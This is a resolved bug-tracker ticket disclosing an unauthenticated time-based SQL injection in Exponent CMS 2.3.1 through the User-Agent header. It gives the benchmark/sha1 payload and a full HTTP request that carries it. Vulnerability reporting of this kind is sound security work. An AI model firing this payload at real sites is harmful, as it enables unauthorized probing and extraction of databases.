#1238 ✓resolved
Narendra Bhati

Time Based SQL Injection " User Agent"

Reported by Narendra Bhati | November 16th, 2014 @ 11:53 AM | in User issues

Exponent CMS 2.3.1 - Time Based SQL Injection

Exploitation - Remotely ( Non Authenticated User Can Exploit It )

Vulnerable Parameter - User Agent Header

Payload - ' and benchmark(20000000,sha1(1))--

Here is http request which is taking 2 seconds to response compare then original response

GET /exponent/users/edituser/id/1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0'%20and%20benchmark(20000000%2csha1(1))--%20
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: pun_cookie_b03d0f=1%7C5c85108006f3ca4b272432a5be442deb43756d9c%7C1447517668%7C75fabcf00a72c6c06c40ec432c44c158a90fe85b; xoadmstyle=orange; PHPSESSID=1snnfufn6jlq63rbf1l7q9ps76; xoops_user54677c84=0
Connection: keep-alive

Comments and changes to this ticket

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

New-ticket Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile ยป

Bug Tracker for Exponent CMS

Shared Ticket Bins

People watching this ticket